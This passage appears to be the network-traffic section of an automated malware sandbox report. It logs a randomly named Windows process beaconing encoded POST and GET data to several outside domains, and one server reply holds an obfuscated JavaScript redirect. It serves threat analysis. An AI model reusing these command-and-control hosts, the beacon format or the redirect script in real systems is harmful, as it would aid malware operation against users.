                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 6a 61 73 4d 70 4a 35 6c 52 4f 52 71 61 36 48 49 50 42 72 4c 71 48 72 32 6c 45 51 55 74 56 49 47 49 76 30 44 6f 38 56 4f 78 6d 62 6d 6d 57 68 35 47 4b 54 51 6e 75 36 74 6e 31 61 68 32 45 63 52 32 32 4f 68 76 63 4d 44 65 4e 68 6c 51 2f 33 75 32 62 76 57 39 67 6a 43 4c 4a 78 79 49 62 55 79 4b 56 50 70 5a 6f 51 2f 72 45 35 51 56 53 72 6e 76 45 33 50 6e 58 51 65 2b 69 33 74 7a 38 43 4d 70 39 6d 52 30 66 6a 70 39 79 2f 30 77 39 59 55 61 36 44 73 6d 48 47 6f 39 52 6a 69 4b 6f 7a 4d 73 62 75 62 31 50 52 70 35 35 35 69 45 36 6c 55 59 6d 55 5a 2b 46 2b 48 45 31 67 34 30 3d
                                                                              Data Ascii: 6Pvh8TXP=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8IhjasMpJ5lRORqa6HIPBrLqHr2lEQUtVIGIv0Do8VOxmbmmWh5GKTQnu6tn1ah2EcR22OhvcMDeNhlQ/3u2bvW9gjCLJxyIbUyKVPpZoQ/rE5QVSrnvE3PnXQe+i3tz8CMp9mR0fjp9y/0w9YUa6DsmHGo9RjiKozMsbub1PRp555iE6lUYmUZ+F+HE1g40=
                                                                              Dec 9, 2024 08:32:59.630390882 CET302INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:32:59 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 138
                                                                              Connection: close
                                                                              ETag: "66927002-8a"
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.749747154.23.184.207805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:00.766001940 CET1818OUTPOST /9ffw/ HTTP/1.1
                                                                              Host: www.d48dk.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.d48dk.top
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 1253
                                                                              Referer: http://www.d48dk.top/9ffw/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 37 61 73 2b 52 4a 36 45 52 4f 51 71 61 36 4e 6f 50 4d 72 4c 71 67 72 31 56 2b 51 55 70 76 49 45 41 76 31 6d 30 38 53 38 56 6d 52 6d 6d 57 35 4a 47 65 65 77 6e 37 36 74 33 78 61 68 6d 45 63 52 32 32 4f 6a 33 63 46 79 65 4e 6d 56 51 2b 30 75 32 50 38 47 38 48 6a 43 6a 7a 78 79 4e 67 58 44 71 56 50 4a 4a 6f 63 74 44 45 6d 41 56 51 71 6e 76 4d 33 50 6a 49 51 65 53 59 33 73 47 68 43 4d 42 39 6d 56 51 41 6b 4c 31 66 74 43 5a 69 55 30 36 6c 4a 36 79 76 4b 72 31 4b 6e 53 4c 4a 39 37 64 6d 67 71 49 41 46 4d 51 66 70 52 4d 74 69 48 6f 58 62 63 54 64 74 58 55 2b 35 2b 51 37 4a 41 65 33 71 78 32 74 56 4c 66 32 6c 33 45 50 35 63 62 75 6f 5a 39 67 36 68 59 59 67 65 4f 58 6c 70 61 59 6c 30 7a 57 65 63 6a 35 50 32 31 51 4c 65 45 6a 42 6f 71 69 57 71 74 6e 46 4b 64 78 63 42 36 65 74 6a 79 38 2b 6b 70 36 39 38 46 74 38 73 4b 43 6f 76 48 74 7a 43 57 6f 5a 33 49 36 49 [TRUNCATED]
                                                                              Data Ascii: 6Pvh8TXP=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8Ih7as+RJ6EROQqa6NoPMrLqgr1V+QUpvIEAv1m08S8VmRmmW5JGeewn76t3xahmEcR22Oj3cFyeNmVQ+0u2P8G8HjCjzxyNgXDqVPJJoctDEmAVQqnvM3PjIQeSY3sGhCMB9mVQAkL1ftCZiU06lJ6yvKr1KnSLJ97dmgqIAFMQfpRMtiHoXbcTdtXU+5+Q7JAe3qx2tVLf2l3EP5cbuoZ9g6hYYgeOXlpaYl0zWecj5P21QLeEjBoqiWqtnFKdxcB6etjy8+kp698Ft8sKCovHtzCWoZ3I6ImyeDRfe5TFBxLXjcsr0Z1sRC8jUv83kJa4kkYaBEeiwJiX6bMAMQFezHlebwvjZ/9p1fMEmkisOMGP5JLAgEPAA62QGUC7oLx7XiJs1bhsuhYvRNAeu3VUp2Ctpu/w1mIi4QctgFpUeKzS+/Lt1fboqWh/rL94m5xcCtcuT7EaLAfl+PtZkbQuDJiBFrudLHEPCEvNXgB2lhhFg3ve75/U1UUVGvuC85n97Z96u92xn2pFM0QFK2gZcsMk256x8tM8fUEDK2qiINUI0A6+x8K631woVtGsZdUTMznAPO6xfPYlthGpH9OAwNX4zSgx2u5ryc68YUBdEQ+OGglDIx/lvkxlNrxPYb3RGwajj869XkLFuoBXR5gZlAS398QuXzR1ZumaV+7cPZVo3EYPcC3iykr20MOO8AaOB74xdF7nFM11vDZOZ4P3z3clHIlpUSpQSKhjEE1Z/sL4F3hyArQTc+kphlOuVKQ7PPzeK1kUHVxsJqnOFIlASJwdYpYmaie5GeEYevNvoxeUE5su1fwgfMfPVmcj8hkz2z8uQdq/4GTgnOg2PAKn5JtYIitgO487v/t7zvNm0glePEt9p8dh2Jvh/V58uzXhtZhkADZ/udt/rL8zpuDluzsNpW4HwXI6Uv3CblEGvMNXmohX10sXx8t6XowUVYDl [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.749753154.23.184.207805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:03.422480106 CET535OUTGET /9ffw/?6Pvh8TXP=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&9dfhu=10RxttPPB0 HTTP/1.1
                                                                              Host: www.d48dk.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Dec 9, 2024 08:33:04.952549934 CET302INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:33:04 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 138
                                                                              Connection: close
                                                                              ETag: "66927002-8a"
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.74977438.165.29.234805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:10.879636049 CET803OUTPOST /d3gs/ HTTP/1.1
                                                                              Host: www.8312zcksnu.bond
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.8312zcksnu.bond
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 221
                                                                              Referer: http://www.8312zcksnu.bond/d3gs/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 67 53 65 74 6e 4c 61 67 4f 78 5a 70 2f 32 6b 66 6d 59 49 37 52 6f 6d 74 43 38 4f 32 63 72 45 78 50 67 72 58 58 71 47 32 72 74 37 6e 39 68 5a 6f 47 74 76 50 72 64 44 62 56 38 7a 35 41 4d 58 69 6f 36 50 64 34 61 49 66 45 34 46 4c 61 53 56 4f 70 33 6f 68 47 31 4f 47 77 47 41 57 6d 42 45 55 46 4a 32 57 75 6b 6f 57 6c 32 33 63 6f 76 6e 72 44 35 6c 65 52 39 71 4e 45 4e 38 64 48 37 2f 73 6f 68 5a 33 78 62 74 39 51 2b 39 6a 37 62 4c 75 37 49 42 6c 65 55 53 56 71 77 72 65 39 41 4b 33 53 78 43 6b 53 53 6a 53 2b 59 64 32 77 45 65 32 34 55 43 5a 65 35 4f 73 34 48 79 73 50 57 2b 74 63 69 4a 77 65 67 3d 3d
                                                                              Data Ascii: 6Pvh8TXP=pni45pvYJcfAgSetnLagOxZp/2kfmYI7RomtC8O2crExPgrXXqG2rt7n9hZoGtvPrdDbV8z5AMXio6Pd4aIfE4FLaSVOp3ohG1OGwGAWmBEUFJ2WukoWl23covnrD5leR9qNEN8dH7/sohZ3xbt9Q+9j7bLu7IBleUSVqwre9AK3SxCkSSjS+Yd2wEe24UCZe5Os4HysPW+tciJweg==


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.74978138.165.29.234805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:13.576628923 CET823OUTPOST /d3gs/ HTTP/1.1
                                                                              Host: www.8312zcksnu.bond
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.8312zcksnu.bond
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 241
                                                                              Referer: http://www.8312zcksnu.bond/d3gs/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 67 78 4f 41 62 58 57 76 6d 32 73 74 37 6e 7a 42 5a 70 43 74 76 51 72 64 50 70 56 2b 6e 35 41 4d 72 69 6f 34 58 64 34 70 51 63 57 59 46 4a 53 79 56 51 6a 58 6f 68 47 31 4f 47 77 47 55 76 6d 48 73 55 46 36 75 57 30 47 4d 4a 2b 57 33 66 76 76 6e 72 48 35 6c 61 52 39 72 59 45 50 49 33 48 35 48 73 6f 6c 64 33 78 71 74 2b 66 2b 39 6c 6c 72 4c 39 38 35 6b 54 58 6b 4f 32 31 6d 6a 41 33 33 43 79 65 6e 44 47 49 77 76 2b 67 4a 6c 4e 30 47 36 41 76 79 66 73 63 34 4b 30 31 6c 47 4e 51 68 62 48 52 77 6f 30 49 66 56 4f 61 41 6f 6d 6b 67 51 65 79 42 6e 70 5a 64 69 6f 52 5a 38 3d
                                                                              Data Ascii: 6Pvh8TXP=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYgxOAbXWvm2st7nzBZpCtvQrdPpV+n5AMrio4Xd4pQcWYFJSyVQjXohG1OGwGUvmHsUF6uW0GMJ+W3fvvnrH5laR9rYEPI3H5Hsold3xqt+f+9llrL985kTXkO21mjA33CyenDGIwv+gJlN0G6Avyfsc4K01lGNQhbHRwo0IfVOaAomkgQeyBnpZdioRZ8=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.74978738.165.29.234805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:16.262901068 CET1836OUTPOST /d3gs/ HTTP/1.1
                                                                              Host: www.8312zcksnu.bond
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.8312zcksnu.bond
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 1253
                                                                              Referer: http://www.8312zcksnu.bond/d3gs/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 6f 78 50 79 54 58 57 4a 75 32 74 74 37 6e 73 78 5a 6b 43 74 76 64 72 64 6e 74 56 2b 72 70 41 4a 76 69 70 62 66 64 76 4d 6b 63 64 59 46 4a 65 53 56 52 70 33 6f 34 47 31 65 43 77 47 45 76 6d 48 73 55 46 39 57 57 36 45 6f 4a 38 57 33 63 6f 76 6e 6e 44 35 6c 32 52 39 6a 49 45 50 4d 4e 48 6f 6e 73 72 46 4e 33 32 49 46 2b 53 2b 39 6e 6b 72 4b 67 38 35 59 41 58 6b 43 36 31 6d 2f 2b 33 77 47 79 62 57 61 4d 53 53 66 70 39 35 45 58 33 46 69 54 70 52 7a 47 46 4a 61 6a 32 32 65 57 53 54 44 47 4a 32 41 62 4c 36 4d 7a 4c 7a 30 46 6f 43 63 32 31 6b 36 68 62 73 33 73 41 59 76 71 6d 58 42 79 42 44 76 34 64 4d 61 5a 56 54 42 36 37 6a 6a 39 79 58 4f 55 4f 6e 31 45 77 37 67 64 6b 54 61 33 48 37 54 2f 6d 48 66 74 2b 6b 75 59 34 51 70 2f 34 69 59 31 69 4e 4c 69 47 42 46 65 6a 36 56 33 34 6e 48 2b 6c 62 67 6f 56 41 6d 4b 4e 6d 54 4d 46 39 68 69 6f 61 65 45 36 6c 79 6a 79 [TRUNCATED]
                                                                              Data Ascii: 6Pvh8TXP=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYoxPyTXWJu2tt7nsxZkCtvdrdntV+rpAJvipbfdvMkcdYFJeSVRp3o4G1eCwGEvmHsUF9WW6EoJ8W3covnnD5l2R9jIEPMNHonsrFN32IF+S+9nkrKg85YAXkC61m/+3wGybWaMSSfp95EX3FiTpRzGFJaj22eWSTDGJ2AbL6MzLz0FoCc21k6hbs3sAYvqmXByBDv4dMaZVTB67jj9yXOUOn1Ew7gdkTa3H7T/mHft+kuY4Qp/4iY1iNLiGBFej6V34nH+lbgoVAmKNmTMF9hioaeE6lyjyJN6VWOdTWnlFOpEYWt+L/b9PeQKW45ib64oeSx9AhP+nNQkUf5rHAJz2iRK+raVsszc7xmAvpdTfRrwuEDKHPYJ+Gv1O/mxqIR+q6xqeFgU7oo7zUcIR73oGE4Y2wkAQEt22OgaW0g0qiMlyhsriPzQuY3tjX/8FMJKxshiNeyobbvHyP/zdNRfSsLF5uWNPdopyOuV2c2vZFXaWIKoX7BghSdQzZyfAHv4sO00OB6ttMF60q0o5zUq5pR6icQYwZNxWpMl06R1qy04AJBfl6Jz0b0MCYWPxhFR/bIlV40Kz7jhhldjygDTEPgUPd59vBnln5V5/b8E9cZ0uSBE4Yjt2qLbCai2oyXa2K5mvVSkkqHKA9OxnF/O3JpUMMCtDD7sXGx/w2KdWjd9Q9erBh3csMDKIOi/eRGBep7yUEaOxjGPIMPZcQ2pRbS7ig2JqO+lrHlD+Q3grFr2llkkn1AChKCMV64CLsyUWJlIQDxDmT4hJUXJqMS6iX8lMCvcVT5CGm7ptH+eEIt1ozbNplD1vnpcM5mNq3ThVx/GUWuASMwCOmqrux+7OkFtRWbuXhrgctO9pwyuMSKtbNGzO3EQzqtyBqQ1DIZjaL++W8MqMJdF79dhPHNrVwNKJD9TIZSmcXBEt1ZyRJTKPGamPM+SAQoS9NfXzmT [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.74979338.165.29.234805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:19.121292114 CET541OUTGET /d3gs/?6Pvh8TXP=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&9dfhu=10RxttPPB0 HTTP/1.1
                                                                              Host: www.8312zcksnu.bond
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Dec 9, 2024 08:33:21.000924110 CET858INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:33:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Data Raw: 32 39 39 0d 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 37 34 61 39 61 63 65 62 37 63 61 63 32 35 64 61 66 61 37 61 30 62 31 35 63 64 38 62 35 63 39 64 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 31 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 [TRUNCATED]
                                                                              Data Ascii: 299<script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script> var url = "https://shksj.sdnasj.nduau.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(function() { window[_0x0[0]][_0x0[1]] = url; }, 0);</script>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.74981313.248.169.48805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:26.687251091 CET785OUTPOST /4nyz/ HTTP/1.1
                                                                              Host: www.snyp.shop
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.snyp.shop
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 221
                                                                              Referer: http://www.snyp.shop/4nyz/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 4e 52 6f 68 66 4b 6a 7a 77 59 44 47 6d 6c 46 78 72 7a 43 30 62 73 69 4b 31 4c 35 4d 72 4e 63 51 6a 53 67 54 51 4a 58 44 41 6f 79 51 34 35 67 2b 48 52 55 65 4b 36 38 6e 4d 79 4b 4a 49 65 4e 57 48 48 31 71 63 53 6c 59 66 6e 38 62 6c 50 33 4e 45 70 51 52 37 44 55 65 62 78 48 43 57 4a 48 76 61 49 35 32 39 2f 67 6c 41 2b 32 34 78 48 5a 44 70 4b 33 71 55 53 39 79 56 63 46 58 37 7a 42 4b 6f 2b 76 6f 32 58 44 6a 36 39 69 41 69 63 2f 6d 47 73 53 51 67 56 31 58 50 48 74 6e 62 48 5a 49 69 31 71 33 78 39 68 55 6a 38 73 34 35 67 6f 64 39 43 5a 64 36 6f 62 50 69 6b 58 69 66 33 70 4c 47 4d 54 78 31 67 3d 3d
                                                                              Data Ascii: 6Pvh8TXP=WekfKnjJCwpVNRohfKjzwYDGmlFxrzC0bsiK1L5MrNcQjSgTQJXDAoyQ45g+HRUeK68nMyKJIeNWHH1qcSlYfn8blP3NEpQR7DUebxHCWJHvaI529/glA+24xHZDpK3qUS9yVcFX7zBKo+vo2XDj69iAic/mGsSQgV1XPHtnbHZIi1q3x9hUj8s45god9CZd6obPikXif3pLGMTx1g==
                                                                              Dec 9, 2024 08:33:27.761787891 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.74982013.248.169.48805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:29.432353020 CET805OUTPOST /4nyz/ HTTP/1.1
                                                                              Host: www.snyp.shop
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.snyp.shop
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 241
                                                                              Referer: http://www.snyp.shop/4nyz/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 34 51 6a 77 6f 54 52 4e 4c 44 44 6f 79 51 77 5a 67 33 59 68 55 4a 4b 36 78 51 4d 7a 47 4a 49 59 68 57 48 43 52 71 63 6c 78 62 66 33 38 64 74 76 33 4c 41 70 51 52 37 44 55 65 62 78 69 58 57 4a 66 76 5a 34 4a 32 38 65 67 6d 62 65 32 37 32 48 5a 44 6a 71 33 32 55 53 39 41 56 5a 35 78 37 78 4a 4b 6f 2b 66 6f 32 46 72 38 30 39 69 4f 2f 4d 2b 66 4a 4d 58 67 6e 30 4a 76 4f 6b 52 79 53 56 52 69 6a 44 72 56 72 66 74 34 39 74 55 44 39 69 4d 72 71 6b 45 6f 34 70 66 58 76 47 6a 44 41 41 4d 68 4c 65 79 31 6a 63 44 68 4c 36 42 48 42 30 4f 31 2f 77 5a 4b 50 4c 79 4a 34 61 77 3d
                                                                              Data Ascii: 6Pvh8TXP=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/4QjwoTRNLDDoyQwZg3YhUJK6xQMzGJIYhWHCRqclxbf38dtv3LApQR7DUebxiXWJfvZ4J28egmbe272HZDjq32US9AVZ5x7xJKo+fo2Fr809iO/M+fJMXgn0JvOkRySVRijDrVrft49tUD9iMrqkEo4pfXvGjDAAMhLey1jcDhL6BHB0O1/wZKPLyJ4aw=
                                                                              Dec 9, 2024 08:33:30.438803911 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.74982613.248.169.48805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:32.217272043 CET1818OUTPOST /4nyz/ HTTP/1.1
                                                                              Host: www.snyp.shop
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.snyp.shop
